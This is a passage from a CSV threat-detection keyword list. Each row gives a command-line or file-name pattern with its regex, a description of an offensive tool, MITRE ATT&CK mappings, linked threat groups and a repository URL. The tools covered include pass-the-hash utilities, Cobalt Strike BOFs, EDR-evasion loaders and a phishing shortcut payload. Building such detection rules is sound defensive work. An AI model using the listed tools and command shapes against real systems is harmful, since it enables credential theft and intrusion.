thief.py*",".{0,1000}\sthief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "* --threads * scan --buckets-file* ",".{0,1000}\s\-\-threads\s.{0,1000}\sscan\s\-\-buckets\-file.{0,1000}\s","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "* ticket_converter.py*",".{0,1000}\sticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "* ticketConverter.py*",".{0,1000}\sticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* ticketsplease.*",".{0,1000}\sticketsplease\..{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "* TikiLoader*",".{0,1000}\sTikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "* tls-alpn.nse*",".{0,1000}\stls\-alpn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tls-nextprotoneg.nse*",".{0,1000}\stls\-nextprotoneg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tls-ticketbleed.nse*",".{0,1000}\stls\-ticketbleed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tmp_payload.txt*",".{0,1000}\stmp_payload\.txt.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "* tn3270-screen.nse*",".{0,1000}\stn3270\-screen\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* TokenStrip.c *",".{0,1000}\sTokenStrip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenStripBOF.o *",".{0,1000}\sTokenStripBOF\.o\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","32","6","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "* TokenUniverse.zip*",".{0,1000}\sTokenUniverse\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","0","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "* tokenvator *",".{0,1000}\stokenvator\s.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "* -Tokenvator -Command *",".{0,1000}\s\-Tokenvator\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --tor *",".{0,1000}\s\-\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* tor deb.torproject.org-keyring*",".{0,1000}\stor\sdeb\.torproject\.org\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "* tor:amd64 *",".{0,1000}\stor\:amd64\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* tor-consensus-checker.nse*",".{0,1000}\stor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --tor-port*",".{0,1000}\s\-\-tor\-port.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* --tor-type*",".{0,1000}\s\-\-tor\-type.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* toteslegit.ps1*",".{0,1000}\stoteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* traceroute-geolocation.nse*",".{0,1000}\straceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --transformer donut*",".{0,1000}\s\-\-transformer\sdonut.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer Loader*",".{0,1000}\s\-\-transformer\sLoader.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer pe2sh*",".{0,1000}\s\-\-transformer\spe2sh.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --transformer sRDI*",".{0,1000}\s\-\-transformer\ssRDI.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* tricky.ps1*",".{0,1000}\stricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* tricky.vbs*",".{0,1000}\stricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* tricky2.ps1*",".{0,1000}\stricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "* --trusted-for-delegation *",".{0,1000}\s\-\-trusted\-for\-delegation\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* TSCHRPCAttack*",".{0,1000}\sTSCHRPCAttack.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* tso-brute.nse*",".{0,1000}\stso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* tso-enum.nse*",".{0,1000}\stso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --tunnel-address 127.0.0.1:7171*",".{0,1000}\s\-\-tunnel\-address\s127\.0\.0\.1\:7171.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "* tunnel-socks5.py*",".{0,1000}\stunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* TunnelVisionVM.ova*",".{0,1000}\sTunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* tweetshell.sh*",".{0,1000}\stweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "* --type asreproast*",".{0,1000}\s\-\-type\sasreproast.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* --type search-spn*",".{0,1000}\s\-\-type\ssearch\-spn.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","5","2","142","32","2024-03-25T13:05:26Z","2019-12-08T00:25:57Z" "* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBClient\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBEnum\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sSMBExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -type user -search * -DomainController * -Credential * -list yes*",".{0,1000}\s\-type\suser\s\-search\s.{0,1000}\s\-DomainController\s.{0,1000}\s\-Credential\s.{0,1000}\s\-list\syes.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Type WMIExec *",".{0,1000}\s\-Type\sWMIExec\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *",".{0,1000}\s\-Type\sWMIExec\s\-Target\s.{0,1000}\s\-TargetExclude\s.{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*",".{0,1000}\s\-u\s.{0,1000}\s\-d\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-k\s\-\-no\-pass\s\-\-target\s.{0,1000}\s\-\-action\s\""list\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "* -u * --local-auth*",".{0,1000}\s\-u\s.{0,1000}\s\-\-local\-auth.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * --lusers*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-lusers.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * -M handlekatz*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\shandlekatz.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 